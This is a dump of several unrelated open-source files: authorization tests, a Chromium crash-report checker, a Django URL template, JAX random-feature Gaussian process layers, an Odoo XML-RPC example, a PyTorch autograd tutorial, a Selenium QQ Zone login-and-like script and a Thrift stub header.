def test_plugin_simple_rule_0_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=TRUSTEE, endorser=None, sigs=signature,
is_owner=owner, amount=2, extra_sigs=True)
for signature in signatures
for owner in [True, False]],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=TRUSTEE, endorser=ENDORSER, sigs={ENDORSER: s},
is_owner=owner, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_not_allowed(write_auth_req_validator, write_request_validation,
author, endorser, signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraintForbidden(),
valid_actions=[],
author=author, endorser=endorser,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
|
chrome/test/kasko/py/kasko/report.py | google-ar/chromium | 777 | 12748304 | <reponame>google-ar/chromium
#!/usr/bin/env python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utility functions for dealing with crash reports."""
import logging
import os
_LOGGER = logging.getLogger(os.path.basename(__file__))
def LogCrashKeys(report):
for key in sorted(report.keys()):
val = report[key][0]
if (len(val) < 64):
_LOGGER.debug('Got crashkey "%s": "%s"', key, val)
else:
_LOGGER.debug('Got crashkey "%s": ...%d bytes...', key, len(val))
def ValidateCrashReport(report, expectations=None):
expected_keys = {}
# The following keys are all expected to be set in all crashes, and should
# be set by GetCrashKeysForKasko. The 'channel' crash-key doesn't need to be
# set as it is omitted when empty (developer builds).
get_crash_keys = 'GetCrashKeysForKasko'
for k in ['guid', 'prod', 'plat', 'ver', 'ptype']:
expected_keys[k] = get_crash_keys
# The following crash keys are expected to be set by the Kasko code itself.
kasko = 'Kasko'
for k in ['kasko-generated-by-version', 'kasko-uploaded-by-version']:
expected_keys[k] = kasko
# Merge in additional expectations.
if expectations:
for key, value in expectations.iteritems():
expected_keys[key] = value
# Validate the expectations.
missing_keys = False
for expected_key, error in expected_keys.iteritems():
if expected_key not in report:
_LOGGER.error('Missing expected "%s" crash key.', expected_key)
_LOGGER.error('"%s" integration appears broken.', error)
missing_keys = True
if missing_keys:
raise Exception('Missing expected crash keys.')
|
lib/django-0.96/django/conf/project_template/urls.py | MiCHiLU/google_appengine_sdk | 790 | 12748335 | <filename>lib/django-0.96/django/conf/project_template/urls.py
from django.conf.urls.defaults import *
urlpatterns = patterns('',
# Example:
# (r'^{{ project_name }}/', include('{{ project_name }}.foo.urls')),
# Uncomment this for admin:
# (r'^admin/', include('django.contrib.admin.urls')),
)
|
edward2/jax/nn/random_feature.py | google/edward2 | 591 | 12748339 | # coding=utf-8
# Copyright 2021 The Edward2 Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definitions for random feature Gaussian process layer.
## References:
[1]: Liu et al. Simple and principled uncertainty estimation with deterministic
deep learning via distance awareness. In _Neural Information Processing
Systems_, 2020.
https://arxiv.org/abs/2006.10108
[2]: Xu et al. Understanding and Improving Layer Normalization. In _Neural
Information Processing Systems_, 2019.
https://papers.nips.cc/paper/2019/file/2f4fe03d77724a7217006e5d16728874-Paper.pdf
[3]: <NAME> and <NAME>. Random Features for Large-Scale Kernel
Machines. In _Neural Information Processing Systems_, 2007.
https://people.eecs.berkeley.edu/~brecht/papers/07.rah.rec.nips.pdf
[4]: <NAME>, <NAME>, <NAME>. Uncertainty Estimation with Infinitesimal
Jackknife. _arXiv preprint arXiv:2006.07584_, 2020.
https://arxiv.org/abs/2006.07584
"""
import dataclasses
import functools
from typing import Any, Callable, Iterable, Mapping, Optional, Tuple, Union
import flax.linen as nn
import jax
from jax import lax
from jax import random
import jax.numpy as jnp
# Jax-related data types.
PRNGKey = Any
Shape = Iterable[int]
Dtype = type(jnp.float32)
Array = jnp.ndarray
Initializer = Callable[[PRNGKey, Shape, Dtype], Array]
# Default config for random features.
default_rbf_activation = jnp.cos
default_rbf_bias_init = nn.initializers.uniform(scale=2. * jnp.pi)
# Using "he_normal" style random feature distribution. Effectively, this is
# equivalent to approximating a RBF kernel but with the input standardized by
# its dimensionality (i.e., input_scaled = input * sqrt(2. / dim_input)) and
# empirically leads to better performance for neural network inputs.
default_rbf_kernel_init = nn.initializers.variance_scaling(
scale=2.0, mode='fan_in', distribution='normal')
# Default field value for kwargs, to be used for data class declaration.
default_kwarg_dict = lambda: dataclasses.field(default_factory=dict)
SUPPORTED_LIKELIHOOD = ('binary_logistic', 'poisson', 'gaussian')
MIN_SCALE_MONTE_CARLO = 1e-3
class RandomFeatureGaussianProcess(nn.Module):
"""A Gaussian process layer using random Fourier features [1].
Attributes:
features: the number of output units.
hidden_features: the number of hidden random fourier features.
normalize_input: whether to normalize the input using nn.LayerNorm.
norm_kwargs: Optional keyword arguments to the input nn.LayerNorm layer.
hidden_kwargs: Optional keyword arguments to the random feature layer.
output_kwargs: Optional keyword arguments to the predictive logit layer.
covmat_kwargs: Optional keyword arguments to the predictive covmat layer.
"""
features: int
hidden_features: int = 1024
normalize_input: bool = True
# Optional keyword arguments.
norm_kwargs: Mapping[str, Any] = default_kwarg_dict()
hidden_kwargs: Mapping[str, Any] = default_kwarg_dict()
output_kwargs: Mapping[str, Any] = default_kwarg_dict()
covmat_kwargs: Mapping[str, Any] = default_kwarg_dict()
def setup(self):
"""Defines model layers."""
# pylint:disable=invalid-name,not-a-mapping
if self.normalize_input:
# Prefer a parameter-free version of LayerNorm by default [2]. Can be
# overwritten by passing norm_kwargs=dict(use_bias=..., use_scales=...).
LayerNorm = functools.partial(
nn.LayerNorm, use_bias=False, use_scale=False)
self.norm_layer = LayerNorm(**self.norm_kwargs)
self.hidden_layer = RandomFourierFeatures(
features=self.hidden_features, **self.hidden_kwargs)
self.output_layer = nn.Dense(features=self.features, **self.output_kwargs)
self.covmat_layer = LaplaceRandomFeatureCovariance(
hidden_features=self.hidden_features, **self.covmat_kwargs)
# pylint:enable=invalid-name,not-a-mapping
def __call__(self,
inputs: Array,
return_full_covmat: bool = False,
return_random_features: bool = False) -> Array:
"""Computes Gaussian process outputs.
Args:
inputs: the nd-array of shape (batch_size, ..., input_dim).
return_full_covmat: whether to return the full covariance matrix, shape
(batch_size, batch_size), or only return the predictive variances with
shape (batch_size, ).
return_random_features: whether to return the random fourier features for
the inputs.
Returns:
A tuple of predictive logits, predictive covmat and (optionally)
random Fourier features.
"""
gp_inputs = self.norm_layer(inputs) if self.normalize_input else inputs
gp_features = self.hidden_layer(gp_inputs)
gp_logits = self.output_layer(gp_features)
gp_covmat = self.covmat_layer(
gp_features, gp_logits, diagonal_only=not return_full_covmat)
# Returns predictive logits, covmat and (optionally) random features.
if return_random_features:
return gp_logits, gp_covmat, gp_features
return gp_logits, gp_covmat
class RandomFourierFeatures(nn.Module):
"""A random fourier feature (RFF) layer that approximates a kernel model.
The random feature transformation is a one-hidden-layer network with
non-trainable weights (see, e.g., Algorithm 1 of [3]). Specifically:
f(x) = activation(x @ kernel + bias) * output_scale.
The forward pass logic closely follows that of the nn.Dense.
Attributes:
features: the number of output units.
feature_scalefeature_scale: scale to apply to the output
(default: sqrt(2. / features), see Algorithm 1 of [3]).
activation: activation function to apply to the output.
kernel_init: initializer function for the weight matrix.
bias_init: initializer function for the bias.
seed: random seed for generating random features (default: 0). This will
override the external RNGs.
dtype: the dtype of the computation (default: float32).
"""
features: int
feature_scale: Optional[jnp.float32] = 1.
activation: Callable[[Array], Array] = default_rbf_activation
kernel_init: Initializer = default_rbf_kernel_init
bias_init: Initializer = default_rbf_bias_init
seed: int = 0
dtype: Dtype = jnp.float32
collection_name: str = 'random_features'
def setup(self):
# Defines the random number generator.
self.rng = random.PRNGKey(self.seed)
# Processes random feature scale.
self._feature_scale = self.feature_scale
if self._feature_scale is None:
self._feature_scale = jnp.sqrt(2. / self.features)
self._feature_scale = jnp.asarray(self._feature_scale, dtype=self.dtype)
@nn.compact
def __call__(self, inputs: Array) -> Array:
"""Applies random feature transformation along the last dimension of inputs.
Args:
inputs: The nd-array to be transformed.
Returns:
The transformed input.
"""
# Initializes variables.
input_dim = inputs.shape[-1]
kernel_rng, bias_rng = random.split(self.rng, num=2)
kernel_shape = (input_dim, self.features)
kernel = self.variable(self.collection_name, 'kernel', self.kernel_init,
kernel_rng, kernel_shape, self.dtype)
bias = self.variable(self.collection_name, 'bias', self.bias_init,
bias_rng, (self.features,), self.dtype)
# Specifies multiplication dimension.
contracting_dims = ((inputs.ndim - 1,), (0,))
batch_dims = ((), ())
# Performs forward pass.
inputs = jnp.asarray(inputs, self.dtype)
outputs = lax.dot_general(inputs, kernel.value,
(contracting_dims, batch_dims))
outputs = outputs + jnp.broadcast_to(bias.value, outputs.shape)
return self._feature_scale * self.activation(outputs)
class LaplaceRandomFeatureCovariance(nn.Module):
"""Computes the Gaussian Process covariance using Laplace method.
Attributes:
hidden_features: the number of random fourier features.
ridge_penalty: Initial Ridge penalty to weight covariance matrix. This value
is used to stablize the eigenvalues of weight covariance estimate so that
the matrix inverse can be computed for Cov = inv(t(X) @ X + s * I). The
ridge factor s cannot be too large since otherwise it will dominate the
t(X) * X term and make covariance estimate not meaningful.
momentum: A discount factor used to compute the moving average for posterior
precision matrix. Analogous to the momentum factor in batch normalization.
If `None` then update covariance matrix using a naive sum without
momentum, which is desirable if the goal is to compute the exact
covariance matrix by passing through data once (say in the final epoch).
In this case, make sure to reset the precision matrix variable between
epochs by replacing it with self.initial_precision_matrix().
likelihood: The likelihood to use for computing Laplace approximation for
the covariance matrix. Can be one of ('binary_logistic', 'poisson',
'gaussian').
"""
hidden_features: int
ridge_penalty: float = 1.
momentum: Optional[float] = None
likelihood: str = 'gaussian'
collection_name: str = 'laplace_covariance'
dtype: Dtype = jnp.float32
def setup(self):
if self.momentum is not None:
if self.momentum < 0. or self.momentum > 1.:
raise ValueError(f'`momentum` must be between (0, 1). '
f'Got {self.momentum}.')
if self.likelihood not in SUPPORTED_LIKELIHOOD:
raise ValueError(f'"likelihood" must be one of {SUPPORTED_LIKELIHOOD}, '
f'got {self.likelihood}.')
@nn.compact
def __call__(self,
gp_features: Array,
gp_logits: Optional[Array] = None,
diagonal_only: bool = True) -> Optional[Array]:
"""Updates the precision matrix and computes the predictive covariance.
NOTE:
The precision matrix will be updated only during training (i.e., when
`self.collection_name` are in the list of mutable variables). The covariance
matrix will be computed only during inference to avoid repeated calls to the
(expensive) `linalg.inv` op.
Args:
gp_features: The nd-array of random fourier features, shape (batch_size,
..., hidden_features).
gp_logits: The nd-array of predictive logits, shape (batch_size, ...,
logit_dim). Cannot be None if self.likelihood is not `gaussian`.
diagonal_only: Whether to return only the diagonal elements of the
predictive covariance matrix (i.e., the predictive variance).
Returns:
The predictive variances of shape (batch_size, ) if diagonal_only=True,
otherwise the predictive covariance matrix of shape
(batch_size, batch_size).
"""
gp_features = jnp.asarray(gp_features, self.dtype)
# Flatten GP features and logits to 2-d, by doing so we treat all the
# non-final dimensions as the batch dimensions.
gp_features = jnp.reshape(gp_features, [-1, self.hidden_features])
if gp_logits is not None:
gp_logits = jnp.asarray(gp_logits, self.dtype)
gp_logits = jnp.reshape(gp_logits, [gp_features.shape[0], -1])
precision_matrix = self.variable(self.collection_name, 'precision_matrix',
lambda: self.initial_precision_matrix()) # pylint: disable=unnecessary-lambda
# Updates the precision matrix during training.
initializing = self.is_mutable_collection('params')
training = self.is_mutable_collection(self.collection_name)
if training and not initializing:
precision_matrix.value = self.update_precision_matrix(
gp_features, gp_logits, precision_matrix.value)
# Computes covariance matrix during inference.
if not training:
return self.compute_predictive_covariance(gp_features, precision_matrix,
diagonal_only)
def initial_precision_matrix(self):
"""Returns the initial diagonal precision matrix."""
return jnp.eye(self.hidden_features, dtype=self.dtype) * self.ridge_penalty
def update_precision_matrix(self, gp_features: Array,
gp_logits: Optional[Array],
precision_matrix: Array) -> Array:
"""Updates precision matrix given a new batch.
Args:
gp_features: random features from the new batch, shape (batch_size,
hidden_features)
gp_logits: predictive logits from the new batch, shape (batch_size,
logit_dim). Currently only logit_dim=1 is supported.
precision_matrix: the current precision matrix, shape (hidden_features,
hidden_features).
Returns:
Updated precision matrix, shape (hidden_features, hidden_features).
Raises:
(ValueError) If the logit is None or not univariate when likelihood is
not Gaussian.
"""
if self.likelihood != 'gaussian':
if gp_logits is None:
raise ValueError(
f'`gp_logits` cannot be None when likelihood=`{self.likelihood}`')
if gp_logits.ndim > 1 and gp_logits.shape[-1] != 1:
raise ValueError(
f'likelihood `{self.likelihood}` only support univariate logits. '
f'Got logits dimension: {gp_logits.shape[-1]}')
# Computes precision matrix within new batch.
if self.likelihood == 'binary_logistic':
prob = nn.sigmoid(gp_logits)
prob_multiplier = prob * (1. - prob)
elif self.likelihood == 'poisson':
prob_multiplier = jnp.exp(gp_logits)
else:
prob_multiplier = 1.
gp_features_adj = jnp.sqrt(prob_multiplier) * gp_features
batch_prec_mat = jnp.matmul(jnp.transpose(gp_features_adj), gp_features_adj)
# Updates precision matrix.
if self.momentum is None:
# Performs exact update without momentum.
precision_matrix_updated = precision_matrix + batch_prec_mat
else:
batch_size = gp_features.shape[0]
precision_matrix_updated = (
self.momentum * precision_matrix +
(1 - self.momentum) * batch_prec_mat / batch_size)
return precision_matrix_updated
def compute_predictive_covariance(self, gp_features: Array,
precision_matrix: nn.Variable,
diagonal_only: bool) -> Array:
"""Computes the predictive covariance.
Approximates the Gaussian process posterior using random features.
Given training random feature Phi_tr (num_train, num_hidden) and testing
random feature Phi_ts (batch_size, num_hidden). The predictive covariance
matrix is computed as (assuming Gaussian likelihood):
s * Phi_ts @ inv(t(Phi_tr) * Phi_tr + s * I) @ t(Phi_ts),
where s is the ridge factor to be used for stablizing the inverse, and I is
the identity matrix with shape (num_hidden, num_hidden).
Args:
gp_features: the random feature of testing data to be used for computing
the covariance matrix. Shape (batch_size, gp_hidden_size).
precision_matrix: the model's precision matrix.
diagonal_only: whether to return only the diagonal elements of the
predictive covariance matrix (i.e., the predictive variances).
Returns:
The predictive variances of shape (batch_size, ) if diagonal_only=True,
otherwise the predictive covariance matrix of shape
(batch_size, batch_size).
"""
precision_matrix_inv = jnp.linalg.inv(precision_matrix.value)
cov_feature_product = jnp.matmul(precision_matrix_inv,
jnp.transpose(gp_features))
if diagonal_only:
# Compute diagonal element only, shape (batch_size, ).
# Using the identity diag(A @ B) = col_sum(A * tr(B)).
gp_covar = jnp.sum(
gp_features * jnp.transpose(cov_feature_product), axis=-1)
else:
# Compute full covariance matrix, shape (batch_size, batch_size).
gp_covar = jnp.matmul(gp_features, cov_feature_product)
return self.ridge_penalty * gp_covar
class MCSigmoidDenseFASNGP(nn.Module):
"""Heteroscedastic SNGP for data with sigmoid output activation.
Output layer which combines the benefits of the heteroscedastic
(https://arxiv.org/abs/2105.10305) and SNGP (https://arxiv.org/abs/2006.10108)
methods. Assumes spectral normalization is applied to network producing
`inputs` to the __call__ method.
Attributes:
num_outputs: Number of outputs for classification task.
num_factors: Number of factors to use in approximation to full rank
covariance matrix.
temperature: The softmax temperature.
parameter_efficient: Whether to use the parameter efficient
version of the method. If True then samples from the latent distribution
are generated as: mu(x) + v(x) * matmul(V, eps_R) + diag(d(x), eps_K)),
where eps_R ~ N(0, I_R), eps_K ~ N(0, I_K). If False then latent samples
are generated as: mu(x) + matmul(V(x), eps_R) + diag(d(x), eps_K)).
Computing V(x) as function of x increases the number of parameters
introduced by the method.
train_mc_samples: The number of Monte-Carlo samples used to estimate the
predictive distribution during training.
test_mc_samples: The number of Monte-Carlo samples used to estimate the
predictive distribution during testing/inference.
share_samples_across_batch: If True, the latent noise samples
are shared across batch elements. If encountering XLA compilation errors
due to dynamic shape inference setting = True may solve.
logits_only: If True, only return the logits from the __call__ method.
return_locs: If True, return the location parameter of the Gaussian
latent variable in place of the `logits`.
eps: Clip probabilities into [eps, 1.0] before applying log.
het_var_weight: Weighting on the heteroscedastic variance when computing
samples from the Gaussian latent variable.
sngp_var_weight: Weighting on the GP variance when computing samples from
the Gaussian latent variable.
hidden_features: Number of features for Random Fourier Feature GP
approximation.
normalize_input: Whether to normalize the input for the GP layer.
norm_kwargs: Normalization keywords for the GP layer.
hidden_kwargs: Hidden layer keywords for the GP layer.
output_kwargs: Output keywords for the GP layer.
covmat_kwargs: Covariance matrix keywords for the GP layer.
"""
num_outputs: int
num_factors: int # set num_factors = 0 for diagonal method
temperature: float = 1.0
parameter_efficient: bool = False
train_mc_samples: int = 1000
test_mc_samples: int = 1000
share_samples_across_batch: bool = False
logits_only: bool = False
return_locs: bool = False
eps: float = 1e-7
het_var_weight: float = 1.0
sngp_var_weight: float = 0.0
hidden_features: int = 1024
normalize_input: bool = True
# Optional keyword arguments.
norm_kwargs: Mapping[str, Any] = default_kwarg_dict()
hidden_kwargs: Mapping[str, Any] = default_kwarg_dict()
output_kwargs: Mapping[str, Any] = default_kwarg_dict()
covmat_kwargs: Mapping[str, Any] = default_kwarg_dict()
def setup(self):
if self.parameter_efficient:
self._scale_layer_homoscedastic = nn.Dense(
self.num_outputs, name='scale_layer_homoscedastic')
self._scale_layer_heteroscedastic = nn.Dense(
self.num_outputs, name='scale_layer_heteroscedastic')
elif self.num_factors > 0:
self._scale_layer = nn.Dense(
self.num_outputs * self.num_factors, name='scale_layer')
self._loc_layer = RandomFeatureGaussianProcess(
features=self.num_outputs,
hidden_features=self.hidden_features,
normalize_input=self.normalize_input,
norm_kwargs=self.norm_kwargs,
hidden_kwargs=self.hidden_kwargs,
output_kwargs=self.output_kwargs,
covmat_kwargs=self.covmat_kwargs,
name='loc_layer')
self._diag_layer = nn.Dense(self.num_outputs, name='diag_layer')
def _compute_loc_param(self, inputs: Array) -> Array:
"""Computes location parameter of the "logits distribution".
Args:
inputs: The input to the heteroscedastic output layer.
Returns:
Array of shape [batch_size, num_classes].
"""
return self._loc_layer(inputs)
def _compute_scale_param(self, inputs: Array, covmat_sngp: Array,
training: int) -> Tuple[Array, Array]:
"""Computes scale parameter of the "logits distribution".
Args:
inputs: The input to the heteroscedastic output layer.
covmat_sngp: GP output layer covariance matrix.
training: in training mode or not.
Returns:
2-Tuple of Array of shape
([batch_size, num_classes * max(num_factors, 1)],
[batch_size, num_classes]).
"""
if self.parameter_efficient or self.num_factors <= 0:
low_rank = inputs
diag = jax.nn.softplus(self._diag_layer(inputs)) + MIN_SCALE_MONTE_CARLO
else:
low_rank = self._scale_layer(inputs)
diag = jax.nn.softplus(self._diag_layer(inputs)) + MIN_SCALE_MONTE_CARLO
initializing = self.is_mutable_collection('params')
if training or initializing:
diag_comp = diag
else:
# assume diagonal_only=True
sngp_marginal_vars = jnp.expand_dims(covmat_sngp, -1)
diag_comp = jnp.sqrt(self.het_var_weight * jnp.square(diag) +
self.sngp_var_weight * sngp_marginal_vars)
return low_rank, diag_comp
def _compute_diagonal_noise_samples(self, diag_scale: Array,
num_samples: int) -> Array:
"""Computes samples of the diagonal elements logit noise.
Args:
diag_scale: Array of shape [batch_size, num_classes]. Diagonal
elements of scale parameters of the distribution to be sampled.
num_samples: Number of Monte-Carlo samples to take.
Returns:
Array. Logit noise samples of shape:
[batch_size, num_samples, num_outputs].
"""
if self.share_samples_across_batch:
samples_per_batch = 1
else:
samples_per_batch = diag_scale.shape[0]
key = self.make_rng('diag_noise_samples')
return jnp.expand_dims(diag_scale, 1) * jax.random.normal(
key, shape=(samples_per_batch, num_samples, 1))
def _compute_standard_normal_samples(self, factor_loadings: Array,
num_samples: int) -> Array:
"""Utility that computes samples from a standard normal distribution.
Args:
factor_loadings: Array of shape
[batch_size, num_classes * num_factors]. Factor loadings for scale
parameters of the distribution to be sampled.
num_samples: Number of Monte-Carlo samples to take.
Returns:
Array. Samples of shape: [batch_size, num_samples, num_factors].
"""
if self.share_samples_across_batch:
samples_per_batch = 1
else:
samples_per_batch = factor_loadings.shape[0]
key = self.make_rng('standard_norm_noise_samples')
standard_normal_samples = jax.random.normal(
key, shape=(samples_per_batch, num_samples, self.num_factors))
if self.share_samples_across_batch:
standard_normal_samples = jnp.tile(standard_normal_samples,
[factor_loadings.shape[0], 1, 1])
return standard_normal_samples
def _compute_noise_samples(self, scale: Tuple[Array, Array],
num_samples: int) -> Array:
"""Utility function that computes additive noise samples.
Args:
scale: Tuple of Array of shape (
[batch_size, num_classes * num_factors],
[batch_size, num_classes]). Factor loadings and diagonal elements
for scale parameters of the distribution to be sampled.
num_samples: Number of Monte-Carlo samples to take.
Returns:
Array. Logit noise samples of shape:
[batch_size, num_samples, num_outputs].
"""
factor_loadings, diag_scale = scale
# Compute the diagonal noise
diag_noise_samples = self._compute_diagonal_noise_samples(diag_scale,
num_samples)
if self.num_factors > 0:
# Now compute the factors
standard_normal_samples = self._compute_standard_normal_samples(
factor_loadings, num_samples)
if self.parameter_efficient:
res = self._scale_layer_homoscedastic(standard_normal_samples)
res *= jnp.expand_dims(
self._scale_layer_heteroscedastic(factor_loadings), 1)
else:
# reshape scale vector into factor loadings matrix
factor_loadings = jnp.reshape(factor_loadings,
[-1, self.num_outputs, self.num_factors])
# transform standard normal into ~ full rank covariance Gaussian samples
res = jnp.einsum('ijk,iak->iaj',
factor_loadings, standard_normal_samples)
return res + diag_noise_samples
return diag_noise_samples
def _compute_mc_samples(self, locs: Array, scale: Array,
num_samples: int) -> Array:
"""Utility function that computes Monte-Carlo samples (using sigmoid).
Args:
locs: Array of shape [batch_size, total_mc_samples, num_outputs].
Location parameters of the distributions to be sampled.
scale: Array of shape [batch_size, total_mc_samples, num_outputs].
Scale parameters of the distributions to be sampled.
num_samples: Number of Monte-Carlo samples to take.
Returns:
Array of shape [batch_size, num_samples, num_outputs]. Average over the
MC samples.
"""
locs = jnp.expand_dims(locs, axis=1)
noise_samples = self._compute_noise_samples(scale, num_samples)
latents = locs + noise_samples
samples = jax.nn.sigmoid(latents / self.temperature)
return jnp.mean(samples, axis=1)
@nn.compact
def __call__(self, inputs: Array, training: int = True) -> Union[
Tuple[Array, Array], Tuple[Array, Array, Array, Array]]:
"""Computes predictive and log predictive distributions.
Uses Monte Carlo estimate of sigmoid approximation to HetSNGP model to
compute predictive distribution.
Args:
inputs: The input to the heteroscedastic output layer.
training: Whether we are training or not.
Returns:
Tuple of Array: (logits, covmat_sngp) if logits_only = True. Otherwise,
tuple of (logits, covmat_sngp, log_probs, probs). Logits
represents the argument to a sigmoid function that would yield probs
(logits = inverse_sigmoid(probs)), so logits can be used with the
sigmoid cross-entropy loss function.
"""
# return_random_features set to False, so guaranteed to return 2-tuple
locs, covmat_sngp = self._compute_loc_param(inputs) # pylint: disable=assignment-from-none,unbalanced-tuple-unpacking
# guaranteed to return 2-tuple due to scale_layer construction
scale = self._compute_scale_param(inputs, covmat_sngp, training) # pylint: disable=assignment-from-none
if training:
total_mc_samples = self.train_mc_samples
else:
total_mc_samples = self.test_mc_samples
probs_mean = self._compute_mc_samples(locs, scale, total_mc_samples)
probs_mean = jnp.clip(probs_mean, a_min=self.eps)
log_probs = jnp.log(probs_mean)
# inverse sigmoid
probs_mean = jnp.clip(probs_mean, a_min=self.eps, a_max=1.0 - self.eps)
logits = log_probs - jnp.log(1.0 - probs_mean)
if self.return_locs:
logits = locs
if self.logits_only:
return logits, covmat_sngp
return logits, covmat_sngp, log_probs, probs_mean
|
Chapter20/02_xmlrpc_fetch_data/books_data2.py | PacktPublishing/-Odoo-13-Development-Cookbook-Fouth-Edition | 125 | 12748342 | <filename>Chapter20/02_xmlrpc_fetch_data/books_data2.py
from xmlrpc import client
# books data with search_read method
server_url = 'http://localhost:8069'
db_name = 'book-db-14'
username = 'admin'
password = '<PASSWORD>'
common = client.ServerProxy('%s/xmlrpc/2/common' % server_url)
user_id = common.authenticate(db_name, username, password, {})
models = client.ServerProxy('%s/xmlrpc/2/object' % server_url)
if user_id:
search_domain = ['|', ['name', 'ilike', 'odoo'], ['name', 'ilike', 'sql']]
books_ids = models.execute_kw(db_name, user_id, password,
'library.book', 'search_read',
[search_domain, ['name', 'date_release']],
{'limit': 5})
print('Books data:', books_ids)
else:
print('Wrong credentials') |
beginner_source/former_torchies/autograd_tutorial_old.py | Ismail-Mustapha/tutorials | 6,424 | 12748343 | <gh_stars>1000+
# -*- coding: utf-8 -*-
"""
Autograd
========
Autograd is now a core torch package for automatic differentiation.
It uses a tape based system for automatic differentiation.
In the forward phase, the autograd tape will remember all the operations
it executed, and in the backward phase, it will replay the operations.
Tensors that track history
--------------------------
In autograd, if any input ``Tensor`` of an operation has ``requires_grad=True``,
the computation will be tracked. After computing the backward pass, a gradient
w.r.t. this tensor is accumulated into ``.grad`` attribute.
There’s one more class which is very important for autograd
implementation - a ``Function``. ``Tensor`` and ``Function`` are
interconnected and build up an acyclic graph, that encodes a complete
history of computation. Each variable has a ``.grad_fn`` attribute that
references a function that has created a function (except for Tensors
created by the user - these have ``None`` as ``.grad_fn``).
If you want to compute the derivatives, you can call ``.backward()`` on
a ``Tensor``. If ``Tensor`` is a scalar (i.e. it holds a one element
tensor), you don’t need to specify any arguments to ``backward()``,
however if it has more elements, you need to specify a ``grad_output``
argument that is a tensor of matching shape.
"""
import torch
###############################################################
# Create a tensor and set requires_grad=True to track computation with it
x = torch.ones(2, 2, requires_grad=True)
print(x)
###############################################################
#
print(x.data)
###############################################################
#
print(x.grad)
###############################################################
#
print(x.grad_fn) # we've created x ourselves
###############################################################
# Do an operation of x:
y = x + 2
print(y)
###############################################################
# y was created as a result of an operation,
# so it has a grad_fn
print(y.grad_fn)
###############################################################
# More operations on y:
z = y * y * 3
out = z.mean()
print(z, out)
################################################################
# ``.requires_grad_( ... )`` changes an existing Tensor's ``requires_grad``
# flag in-place. The input flag defaults to ``True`` if not given.
a = torch.randn(2, 2)
a = ((a * 3) / (a - 1))
print(a.requires_grad)
a.requires_grad_(True)
print(a.requires_grad)
b = (a * a).sum()
print(b.grad_fn)
###############################################################
# Gradients
# ---------
#
# let's backprop now and print gradients d(out)/dx
out.backward()
print(x.grad)
###############################################################
# By default, gradient computation flushes all the internal buffers
# contained in the graph, so if you even want to do the backward on some
# part of the graph twice, you need to pass in ``retain_variables = True``
# during the first pass.
x = torch.ones(2, 2, requires_grad=True)
y = x + 2
y.backward(torch.ones(2, 2), retain_graph=True)
# the retain_variables flag will prevent the internal buffers from being freed
print(x.grad)
###############################################################
#
z = y * y
print(z)
###############################################################
#
# just backprop random gradients
gradient = torch.randn(2, 2)
# this would fail if we didn't specify
# that we want to retain variables
y.backward(gradient)
print(x.grad)
###############################################################
# You can also stop autograd from tracking history on Tensors
# with requires_grad=True by wrapping the code block in
# ``with torch.no_grad():``
print(x.requires_grad)
print((x ** 2).requires_grad)
with torch.no_grad():
print((x ** 2).requires_grad)
|
qqzone/qq_zone.py | rua-aaa/awesome-python-login-model | 5,857 | 12748357 | <reponame>rua-aaa/awesome-python-login-model
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
info:
author:CriseLYJ
github:https://github.com/CriseLYJ/
update_time:2019-3-7
"""
import time # 用来延时
from selenium import webdriver
driver = webdriver.Chrome() # 选择浏览器,此处我选择的Chrome
QQ_NUMBER = input('请输入你的QQ号')
PASSWORD = input('<PASSWORD>')
driver.get('http://i.qq.com/')
driver.switch_to.frame('login_frame')
driver.find_element_by_id('switcher_plogin').click()
driver.find_element_by_name('u').clear()
driver.find_element_by_name('u').send_keys(QQ_NUMBER) # 此处输入你的QQ号
driver.find_element_by_name('p').clear()
driver.find_element_by_name('p').send_keys(PASSWORD) # 此处输入你的QQ密码
driver.execute_script("document.getElementById('login_button').parentNode.hidefocus=false;")
driver.find_element_by_xpath('//*[@id="loginform"]/div[4]/a').click()
driver.find_element_by_id('login_button').click()
time.sleep(10) # 因为我曾经是QQ会员,所以每次登陆时都会提醒我要不要再续费的弹窗...
driver.find_element_by_id('dialog_button_1').click() # 这个地方是我把那个弹窗给点击了,配合上面的延时用的,延时是等待那个弹窗出现,然后此处点击取消
btns = driver.find_elements_by_css_selector('a.item.qz_like_btn_v3') # 此处是CSS选择器
for btn in btns:
btn.click()
|
core/sqf/src/seatrans/hbase-trx/src/main/python/thrift2/gen-py/hbase/THBaseService.py | CoderSong2015/Apache-Trafodion | 148 | 12748386 | <gh_stars>100-1000
#
# Autogenerated by Thrift Compiler (0.9.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
